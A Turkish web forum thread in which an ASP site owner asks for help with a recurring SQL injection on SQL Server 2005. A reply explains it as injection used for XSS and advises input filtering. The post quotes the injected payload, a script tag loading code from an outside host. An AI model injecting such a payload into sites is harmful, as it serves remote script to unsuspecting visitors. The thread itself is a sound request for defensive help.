Forum

Asp ile kodladığım ...
 
Bildirimler
Hepsini Temizle

Asp ile kodladığım sitenin veritabanı Injection saldırısına uğruyor.

2 Yazılar
2 Üyeler
0 Reactions
554 Görüntüleme
(@hamzasaricicek)
Gönderiler: 112
Estimable Member
Konu başlatıcı
 

Merhabalar,

Asp ile yazmış olduğum bir web sitem var.
Veritabanı SQLServer 2005.  Ne yaptım ise veritabanıma olan saldırıyı
engelleyemedim. Bütün tabloların bütün hücrelerine şöyle bir kayıt
ekleniyor. ""> </title><script src="http://zon.menotepoer.com/sl.php?v=4"></script><!--"  
Temizliyorum ama kısa süre sonra tekrar bu satır ile doluyor. Hosting
değişimi yaptım, IP değişimi yaptım ama bir türlü netice alamadım.

 
Gönderildi : 11/10/2012 18:59

(@AkinDemircan)
Gönderiler: 117
Estimable Member
 

Muhtemelen saldırgan XSS yöntemini kullanmak için bir sql injection saldırı yapmış. Betik dosyalarınızda açık olabilir. Şu linki inceleyin.

http://msdn.microsoft.com/en-us/library/ff649310.aspx  

Bu arada Formlardan, Çerezlerden, Adres çubuğundan v.s. gelen verilere de filtre uygulamalısınız. 

 
Gönderildi : 11/10/2012 20:14

Paylaş: